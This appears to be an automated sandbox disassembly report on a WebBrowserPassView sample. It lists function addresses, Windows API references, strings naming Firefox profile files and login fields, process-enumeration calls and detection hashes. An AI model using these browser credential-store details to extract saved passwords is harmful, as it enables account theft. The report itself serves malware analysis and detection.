API ID: _snwprintfmemset$wcscpy$wcscat
String ID: bgcolor="%s"$ nowrap$ $</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s$o<@
API String ID: 1607361635-3679438452
Opcode ID: 4731570b1df8245d9ba0a7b5cb35d7f58960f04d5df534be5afec6bb741ccfcf
Instruction ID: c9c9c2a4c0014aec28f6a6d1c50fe2906790d152b0bc8d99d06e27721e28e2e0
Opcode Fuzzy Hash: 4731570b1df8245d9ba0a7b5cb35d7f58960f04d5df534be5afec6bb741ccfcf
Instruction Fuzzy Hash: 5B61C031900208EFDF24EF54CC85EEE7779EF45314F1041AAF804AB292DB39AA94CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004134F0 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 145COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00413513

Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314

Part of subcall function 0040A157: GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B

wcscpy.MSVCRT ref: 00413577
wcscpy.MSVCRT ref: 00413588
memset.MSVCRT ref: 004135A1
memset.MSVCRT ref: 004135B6
_snwprintf.MSVCRT ref: 004135D0
wcscpy.MSVCRT ref: 004135E3
memset.MSVCRT ref: 0041360F
memset.MSVCRT ref: 0041366E
memset.MSVCRT ref: 00413683
_snwprintf.MSVCRT ref: 0041369F
wcscpy.MSVCRT ref: 004136B2

Strings

General, xrefs: 00413582
Profile%d, xrefs: 004135BC, 00413691
Path, xrefs: 004136C7
profiles.ini, xrefs: 0041351E
IsRelative, xrefs: 004136E2

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
String ID: General$IsRelative$Path$Profile%d$profiles.ini
API String ID: 2454223109-2600475665
Opcode ID: f5d1d8963b751ecd1a35c643c487ff4ade738b5c65df3c9a6eb4e6993c7bb1e1
Instruction ID: 9f98b962bf64fc41312729a32297df74b75f7af46428a9f2a50f724a012a647b
Opcode Fuzzy Hash: f5d1d8963b751ecd1a35c643c487ff4ade738b5c65df3c9a6eb4e6993c7bb1e1
Instruction Fuzzy Hash: C6510DB294122CBADB20EB55CD45ECF77BCAF55754F0140E6B508A2142EA385B84CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00416E84 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00416EA6
memset.MSVCRT ref: 00416EBB
wcscpy.MSVCRT ref: 00416EED
_snwprintf.MSVCRT ref: 00416F0D
wcscat.MSVCRT ref: 00416F1A
_snwprintf.MSVCRT ref: 00416F49
wcscat.MSVCRT ref: 00416F56
wcscat.MSVCRT ref: 00416F64
wcscat.MSVCRT ref: 00416F76
wcscat.MSVCRT ref: 00416F81
wcscat.MSVCRT ref: 00416F93
wcscat.MSVCRT ref: 00416FA5

Strings

size="%d", xrefs: 00416EFC
<font, xrefs: 00416EE7
color="#%s", xrefs: 00416F38
<b>, xrefs: 00416F70
</font>, xrefs: 00416F9F
</b>, xrefs: 00416F8D

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: wcscat$_snwprintfmemset$wcscpy
String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
API String ID: 3143752011-1996832678
Opcode ID: 3ea85b475066484b5fca8c45ce1ff678e1ca65170c514b6952232c65087133fa
Instruction ID: 38fb58bcee569138cf1c6d38f2492e07bff0653b862c37002d8b5a61cc6a81ae
Opcode Fuzzy Hash: 3ea85b475066484b5fca8c45ce1ff678e1ca65170c514b6952232c65087133fa
Instruction Fuzzy Hash: 0A31C8B2501309BDE720BB559D829BE737C9B41715F21806FF61462182E67C9E858B19

Uniqueness

Uniqueness Score: -1.00%

Function 00413A57 Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040BB60,?,000000FF,00000000,00000104), ref: 00413A6A
GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413A81
GetProcAddress.KERNEL32(NtLoadDriver), ref: 00413A93
GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00413AA5
GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00413AB7
GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00413AC9
GetProcAddress.KERNEL32(NtQueryObject), ref: 00413ADB
GetProcAddress.KERNEL32(NtSuspendProcess), ref: 00413AED
GetProcAddress.KERNEL32(NtResumeProcess), ref: 00413AFF

Strings

NtLoadDriver, xrefs: 00413A83
NtResumeProcess, xrefs: 00413AEF
NtQuerySystemInformation, xrefs: 00413A76
NtUnloadDriver, xrefs: 00413A95
ntdll.dll, xrefs: 00413A65
NtSuspendProcess, xrefs: 00413ADD
NtQuerySymbolicLinkObject, xrefs: 00413AB9
NtQueryObject, xrefs: 00413ACB
NtOpenSymbolicLinkObject, xrefs: 00413AA7

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
API String ID: 667068680-2887671607
Opcode ID: 688ae1a650c2843fb022fdb0e80312dcfa35bd94c2434b86a4149cb05d0d823f
Instruction ID: 3094f08e780b7640ee0285fea3f53bfe9e93f2d39e0d9e3b23931a4aeb60f93e
Opcode Fuzzy Hash: 688ae1a650c2843fb022fdb0e80312dcfa35bd94c2434b86a4149cb05d0d823f
Instruction Fuzzy Hash: 91019774D41714AACB2B9F72ED19A153FA0F704B6371004B7E805922A3DA7CC20CCE8D

Uniqueness

Uniqueness Score: -1.00%

Function 0040913E Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 0040D0D4: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040118B,?,?,?,?,000003FF), ref: 0040D0F2
Part of subcall function 0040D0D4: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040D146

Part of subcall function 0040D19E: _wcsicmp.MSVCRT ref: 0040D1D8

memset.MSVCRT ref: 004091C9
memset.MSVCRT ref: 004091DE
_wtoi.MSVCRT ref: 00409349
_wcsicmp.MSVCRT ref: 0040935D
memset.MSVCRT ref: 0040937E
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 004093B2
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004093C9
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004093E0
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004093F7
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000000FF,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040940E

Part of subcall function 0040911D: _wtoi64.MSVCRT ref: 00409121

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00409425
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040943C
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00409453

Part of subcall function 00408F0A: memset.MSVCRT ref: 00408F30
Part of subcall function 00408F0A: memset.MSVCRT ref: 00408F47
Part of subcall function 00408F0A: strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408F6A
Part of subcall function 00408F0A: strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408FC3
Part of subcall function 00408F0A: strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408FDA
Part of subcall function 00408F0A: strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408FED
Part of subcall function 00408F0A: strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409000
Part of subcall function 00408F0A: strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409013
Part of subcall function 00408F0A: wcscpy.MSVCRT ref: 00409022
Part of subcall function 00408F0A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00409048
Part of subcall function 00408F0A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00409062

Strings

formSubmitURL, xrefs: 00409265
null, xrefs: 00409355
guid, xrefs: 00409258
logins, xrefs: 00409175

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$strcpy$memset$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
String ID: formSubmitURL$guid$logins$null
API String ID: 2959099945-80472114
Opcode ID: 5770c7b9e0db175cc848b6b14382923acb5d78691a521a18d34b6d93cc53e77d
Instruction ID: ed379e5704be75f3e6866550497b864d9ddced9f47acb00a3616e2846d1467bc
Opcode Fuzzy Hash: 5770c7b9e0db175cc848b6b14382923acb5d78691a521a18d34b6d93cc53e77d
Instruction Fuzzy Hash: 318175B1D4021EBAEF20BBA18C82EEE767DEF04318F11417BB514B61D2DA385E459F64

Uniqueness

Uniqueness Score: -1.00%

Function 0040FCDC Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040FD02
memset.MSVCRT ref: 0040FD17
memset.MSVCRT ref: 0040FD2C
_snwprintf.MSVCRT ref: 0040FD5B
_snwprintf.MSVCRT ref: 0040FD8A
wcscpy.MSVCRT ref: 0040FD9B
_snwprintf.MSVCRT ref: 0040FDBB
memset.MSVCRT ref: 0040FDFA
_snwprintf.MSVCRT ref: 0040FE1B
_snwprintf.MSVCRT ref: 0040FE55

Part of subcall function 00416DB4: _snwprintf.MSVCRT ref: 00416DD8

Strings

<table border="1" cellpadding="5"><tr%s>, xrefs: 0040FDAA
<th%s>%s%s%s, xrefs: 0040FE44
width="%s", xrefs: 0040FE0A
bgcolor="%s", xrefs: 0040FD4A
</font>, xrefs: 0040FD95
<font color="%s">, xrefs: 0040FD79

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: _snwprintf$memset$wcscpy
String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
API String ID: 2000436516-3842416460
Opcode ID: 5fe8db686efc772fa6b4f80b717c1a9ed323b4090c8ee1f0a390374eed08aaa7
Instruction ID: de9e738956947f7a13c6b231079008692334f1b8e04242fb28e7d90039f4c50e
Opcode Fuzzy Hash: 5fe8db686efc772fa6b4f80b717c1a9ed323b4090c8ee1f0a390374eed08aaa7
Instruction Fuzzy Hash: 024154B1940219AAEB20EB55CC81EEB737CFF45304F0540BBB908A2552E7399B988F65

Uniqueness

Uniqueness Score: -1.00%

Function 0040FCDB Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 121COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040FD02
memset.MSVCRT ref: 0040FD17
memset.MSVCRT ref: 0040FD2C
_snwprintf.MSVCRT ref: 0040FD5B
_snwprintf.MSVCRT ref: 0040FD8A
wcscpy.MSVCRT ref: 0040FD9B
_snwprintf.MSVCRT ref: 0040FDBB
memset.MSVCRT ref: 0040FDFA
_snwprintf.MSVCRT ref: 0040FE1B
_snwprintf.MSVCRT ref: 0040FE55

Part of subcall function 00416DB4: _snwprintf.MSVCRT ref: 00416DD8

Strings

<table border="1" cellpadding="5"><tr%s>, xrefs: 0040FDAA
<th%s>%s%s%s, xrefs: 0040FE44
width="%s", xrefs: 0040FE0A
bgcolor="%s", xrefs: 0040FD4A
</font>, xrefs: 0040FD95
<font color="%s">, xrefs: 0040FD79

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: _snwprintf$memset$wcscpy
String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
API String ID: 2000436516-3842416460
Opcode ID: 35a9874a1796bbad2c5835aadc159d16ef12338abd3b36aedf42a62c4a9f3186
Instruction ID: 16ebb7c4a1209ddf7042b365c973bf7ab66be9daa39a45122df40dcc931b4b2c
Opcode Fuzzy Hash: 35a9874a1796bbad2c5835aadc159d16ef12338abd3b36aedf42a62c4a9f3186
Instruction Fuzzy Hash: F64194B1940219AAEB20EB55CC81EEB777CFF45304F0540BBF908E2552E7399B988F65

Uniqueness

Uniqueness Score: -1.00%

Function 0040E055 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040E07B
memset.MSVCRT ref: 0040E097

Part of subcall function 0040A189: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040E194,00000000,0040E047,?,00000000,00000208,?), ref: 0040A194

Part of subcall function 00446665: GetFileVersionInfoSizeW.VERSION(0040E0C9,?,00000000), ref: 0044667B
Part of subcall function 00446665: ??2@YAPAXI@Z.MSVCRT ref: 00446696
Part of subcall function 00446665: GetFileVersionInfoW.VERSION(0040E0C9,00000000,?,00000000,00000000,0040E0C9,?,00000000), ref: 004466A6
Part of subcall function 00446665: VerQueryValueW.VERSION(00000000,00453E4C,0040E0C9,?,0040E0C9,00000000,?,00000000,00000000,0040E0C9,?,00000000), ref: 004466B9
Part of subcall function 00446665: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,00453E4C,0040E0C9,?,0040E0C9,00000000,?,00000000,00000000,0040E0C9,?,00000000), ref: 004466F6
Part of subcall function 00446665: _snwprintf.MSVCRT ref: 00446716
Part of subcall function 00446665: wcscpy.MSVCRT ref: 00446740

wcscpy.MSVCRT ref: 0040E0DB
wcscpy.MSVCRT ref: 0040E0EA
wcscpy.MSVCRT ref: 0040E0FA
EnumResourceNamesW.KERNEL32(0040E1F9,00000004,0040DE05,00000000), ref: 0040E15F
EnumResourceNamesW.KERNEL32(0040E1F9,00000005,0040DE05,00000000), ref: 0040E169
wcscpy.MSVCRT ref: 0040E171

Strings

Version, xrefs: 0040E12D
TranslatorURL, xrefs: 0040E117
TranslatorName, xrefs: 0040E106
strings, xrefs: 0040E16B
RTL, xrefs: 0040E140
hE, xrefs: 0040E0F4
general, xrefs: 0040E0EF

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
String ID: RTL$TranslatorName$TranslatorURL$Version$general$hE$strings
API String ID: 3037099051-2452564618
Opcode ID: 36a298b38765c7c9715b799f2682acc7fcb4a893d173dce7fa7602aae9355a61
Instruction ID: 2c5873c7a60e264be4f9171a36220462047ece05b997d6ce6468ce1c7a270e3a
Opcode Fuzzy Hash: 36a298b38765c7c9715b799f2682acc7fcb4a893d173dce7fa7602aae9355a61
Instruction Fuzzy Hash: DB21D972E4021875D720BB978C46FCB3B6C9F45758F010477B90876193E6B85BC885AE

Uniqueness

Uniqueness Score: -1.00%

Function 00404B0A Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 283COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00404B34

Part of subcall function 0040ACA5: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040121D,?,?,?,?,?,?,?), ref: 0040ACBE

memcpy.MSVCRT ref: 00404C24
memcmp.MSVCRT ref: 00404C34
memcpy.MSVCRT ref: 00404C67
memcpy.MSVCRT ref: 00404C80
memcmp.MSVCRT ref: 00404C96
memcpy.MSVCRT ref: 00404CB2
memcpy.MSVCRT ref: 00404CCB
memcmp.MSVCRT ref: 00404D79
memcmp.MSVCRT ref: 00404D91
memcpy.MSVCRT ref: 00404DCA
memcpy.MSVCRT ref: 00404DE6
memcpy.MSVCRT ref: 00404E02
memcmp.MSVCRT ref: 00404E14
memcpy.MSVCRT ref: 00404E38
memcpy.MSVCRT ref: 00404E50

Strings

, xrefs: 00404BFD

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpy$memcmp$ByteCharMultiWidememset
String ID:
API String ID: 3715365532-3916222277
Opcode ID: 5ecca13a8667a5055cb12e86e8931f63f7f9f3ee63bd6537aeb0e59f26b2527b
Instruction ID: 9db0de9f1e5b33104745f3d8eac733b3821debaf75d372e7250164ca2aaf5d57
Opcode Fuzzy Hash: 5ecca13a8667a5055cb12e86e8931f63f7f9f3ee63bd6537aeb0e59f26b2527b
Instruction Fuzzy Hash: 03A1C8B1A01215ABDB11EF61CC41BDF73A8BF45308F01453BFA15E7282E778AA548BD9

Uniqueness

Uniqueness Score: -1.00%

Function 004097B9 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00409C82: CreateFileW.KERNELBASE(00000003,80000000,00000003,00000000,00000003,00000000,00000000,0040D0E2,0040118B,0040118B,?,?,?,?,000003FF), ref: 00409C94

GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,00409C47,?,?,?,0000001E,?,?,00000104), ref: 004097E2
??2@YAPAXI@Z.MSVCRT ref: 004097F6

Part of subcall function 0040A8AE: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040D11F,?,?,00000000), ref: 0040A8C5

memset.MSVCRT ref: 00409828
memset.MSVCRT ref: 0040984A
memset.MSVCRT ref: 0040985F
strcmp.MSVCRT ref: 0040989E
strcpy.MSVCRT(?,?,?,?,?,?), ref: 00409934
strcpy.MSVCRT(?,?,?,?,?,?), ref: 00409953
memset.MSVCRT ref: 00409967
strcmp.MSVCRT ref: 004099C4
??3@YAXPAX@Z.MSVCRT ref: 004099F6
CloseHandle.KERNEL32(?,?,00409C47,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004099FF

Strings

---, xrefs: 004099BE

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$File$strcmpstrcpy$??2@??3@CloseCreateHandleReadSize
String ID: ---
API String ID: 3751793120-2854292027
Opcode ID: 6425a4e30100ff52b62304e5078bf25264edd6a2dcc5b490760ba37801513265
Instruction ID: b5e8b399fdeb6a040b223f826d27245e63d255c1968850f26e436778d13c1eb2
Opcode Fuzzy Hash: 6425a4e30100ff52b62304e5078bf25264edd6a2dcc5b490760ba37801513265
Instruction Fuzzy Hash: 946173B2C0526DAADF21EB948C859DFB7BCAB15314F1440BFE504B3242DB385E85CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00412145 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 0041214B
_wcsicmp.MSVCRT ref: 00412160

Strings

/sxml, xrefs: 00412170
/scomma, xrefs: 004121AF
/shtml, xrefs: 00412146
/sverhtml, xrefs: 0041215B
/stab, xrefs: 00412185
/skeepass, xrefs: 004121C4
/stabular, xrefs: 0041219A

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: _wcsicmp
String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
API String ID: 2081463915-1959339147
Opcode ID: 64e89c5a136ad70e2acd74f1c00236fdbd2f6e87aea00cca4f40c1ec5a2b789d
Instruction ID: e86e95086dff50f6aeac70f7173157b3529105d44adcd95765e423e28c57b3de
Opcode Fuzzy Hash: 64e89c5a136ad70e2acd74f1c00236fdbd2f6e87aea00cca4f40c1ec5a2b789d
Instruction Fuzzy Hash: 7201DE7328B31134F825A1A72D27B8707598BD2B7BF32455BF915C81C5EF8C849450AE

Uniqueness

Uniqueness Score: -1.00%

Function 0041530E Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA

GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0041533A
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0041534B
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041535C
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041536D
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0041537E
FreeLibrary.KERNEL32(00000000), ref: 0041539E

Strings

psapi.dll, xrefs: 0041531C
GetModuleInformation, xrefs: 00415378
GetModuleBaseNameW, xrefs: 00415334
EnumProcesses, xrefs: 00415367
EnumProcessModules, xrefs: 00415345
GetModuleFileNameExW, xrefs: 00415356

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
